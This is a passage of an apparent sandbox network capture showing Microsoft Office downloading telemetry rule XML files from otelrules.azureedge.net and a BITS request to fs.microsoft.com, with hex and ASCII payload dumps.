2024-11-09 01:47:16 UTC	16384	IN	Data Raw: 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 66 61 6c 73 65 22 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: O T="AND"> <L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" /> </L> <R> <V V="false" T="B" />
2024-11-09 01:47:16 UTC	16384	IN	Data Raw: 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 Data Ascii: <S T="2" F="HttpStatus" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T="GE"> <L> <S T="2" F="HttpStatus" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
4	192.168.2.7	49716	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:17 UTC	192	OUT	GET /rules/rule224902v2s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-09 01:47:17 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:17 GMT Content-Type: text/xml Content-Length: 450 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT ETag: "0x8DC582BD4C869AE" x-ms-request-id: 5dfad506-901e-0029-2a46-2e274a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241109T014717Z-15869dbbcc6xcpf8hC1DFWxtx00000000cp00000000095fd x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-09 01:47:17 UTC	450	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN

Session ID	Source IP	Source Port	Destination IP	Destination Port
5	192.168.2.7	49715	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:17 UTC	192	OUT	GET /rules/rule120600v4s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-09 01:47:17 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:17 GMT Content-Type: text/xml Content-Length: 2980 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT ETag: "0x8DC582BA80D96A1" x-ms-request-id: 26663d07-401e-0029-2faf-319b43000000 x-ms-version: 2018-03-28 x-azure-ref: 20241109T014717Z-16547b76f7fm7xw6hC1DFW5px40000000a8g00000000sz0x x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-09 01:47:17 UTC	2980	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"

Session ID	Source IP	Source Port	Destination IP	Destination Port
6	192.168.2.7	49714	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:17 UTC	193	OUT	GET /rules/rule120402v21s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-09 01:47:17 UTC	495	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:17 GMT Content-Type: text/xml Content-Length: 3788 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT ETag: "0x8DC582BAC2126A6" x-ms-request-id: b4d8526a-701e-005c-5649-32bb94000000 x-ms-version: 2018-03-28 x-azure-ref: 20241109T014717Z-17df447cdb5km9skhC1DFWy2rc000000072g00000000cg24 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_MISS Accept-Ranges: bytes
2024-11-09 01:47:17 UTC	3788	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""

Session ID	Source IP	Source Port	Destination IP	Destination Port
7	192.168.2.7	49718	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:17 UTC	192	OUT	GET /rules/rule120609v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-09 01:47:17 UTC	491	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:17 GMT Content-Type: text/xml Content-Length: 408 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT ETag: "0x8DC582BB56D3AFB" x-ms-request-id: 9f0f5f99-201e-0096-25f1-2cace6000000 x-ms-version: 2018-03-28 x-azure-ref: 20241109T014717Z-16547b76f7fdf69shC1DFWcpd00000000ab000000000g6mc x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-09 01:47:17 UTC	408	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port
8	192.168.2.7	49717	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:17 UTC	192	OUT	GET /rules/rule120608v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-09 01:47:17 UTC	538	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:17 GMT Content-Type: text/xml Content-Length: 2160 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT ETag: "0x8DC582BA3B95D81" x-ms-request-id: dcc6854f-e01e-0051-7b03-2d84b2000000 x-ms-version: 2018-03-28 x-azure-ref: 20241109T014717Z-16547b76f7fnlcwwhC1DFWz6gw0000000ap0000000002v53 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-09 01:47:17 UTC	2160	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
9	192.168.2.7	49720	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:18 UTC	192	OUT	GET /rules/rule120610v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-09 01:47:18 UTC	491	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:18 GMT Content-Type: text/xml Content-Length: 474 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT ETag: "0x8DC582B9964B277" x-ms-request-id: 9f8029b1-301e-005d-3786-31e448000000 x-ms-version: 2018-03-28 x-azure-ref: 20241109T014718Z-17df447cdb528ltlhC1DFWnt1c00000006f000000000rmbe x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-09 01:47:18 UTC	474	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
10	192.168.2.7	49721	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:18 UTC	192	OUT	GET /rules/rule120611v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-09 01:47:18 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:18 GMT Content-Type: text/xml Content-Length: 415 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT ETag: "0x8DC582B9F6F3512" x-ms-request-id: 25b84cae-701e-0098-7445-2f395f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241109T014718Z-15869dbbcc6lq2lzhC1DFWym6c00000005rg0000000069sx x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-09 01:47:18 UTC	415	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru

Session ID	Source IP	Source Port	Destination IP	Destination Port
11	192.168.2.7	49722	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:18 UTC	192	OUT	GET /rules/rule120612v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-09 01:47:18 UTC	491	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:18 GMT Content-Type: text/xml Content-Length: 471 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT ETag: "0x8DC582BB10C598B" x-ms-request-id: 1a2e7d6b-a01e-000d-7bfc-2cd1ea000000 x-ms-version: 2018-03-28 x-azure-ref: 20241109T014718Z-16547b76f7fq9mcrhC1DFWq15w0000000acg00000000hdsz x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-09 01:47:18 UTC	471	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
12	192.168.2.7	49723	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:18 UTC	192	OUT	GET /rules/rule120613v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-09 01:47:18 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:18 GMT Content-Type: text/xml Content-Length: 632 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT ETag: "0x8DC582BB6E3779E" x-ms-request-id: 94eba7f5-101e-0079-455c-2e5913000000 x-ms-version: 2018-03-28 x-azure-ref: 20241109T014718Z-15869dbbcc6tfpj2hC1DFW384c00000004a00000000034t6 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-09 01:47:18 UTC	632	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]\|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]

Session ID	Source IP	Source Port	Destination IP	Destination Port
13	192.168.2.7	49724	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:18 UTC	192	OUT	GET /rules/rule120614v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-09 01:47:18 UTC	491	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:18 GMT Content-Type: text/xml Content-Length: 467 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT ETag: "0x8DC582BA6C038BC" x-ms-request-id: a2886317-b01e-00ab-6c01-2ddafd000000 x-ms-version: 2018-03-28 x-azure-ref: 20241109T014718Z-16547b76f7fsjlq8hC1DFWehq00000000aa00000000057tr x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-09 01:47:18 UTC	467	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.7	49725	184.28.90.27	443

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:18 UTC	161	OUT	HEAD /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-11-09 01:47:19 UTC	467	IN	HTTP/1.1 200 OK Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json Content-Type: application/octet-stream ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" Last-Modified: Tue, 16 May 2017 22:58:00 GMT Server: ECAcc (lpl/EF67) X-CID: 11 X-Ms-ApiVersion: Distribute 1.2 X-Ms-Region: prod-weu-z1 Cache-Control: public, max-age=226679 Date: Sat, 09 Nov 2024 01:47:19 GMT Connection: close X-CID: 2

Session ID	Source IP	Source Port	Destination IP	Destination Port
15	192.168.2.7	49726	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:19 UTC	192	OUT	GET /rules/rule120615v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
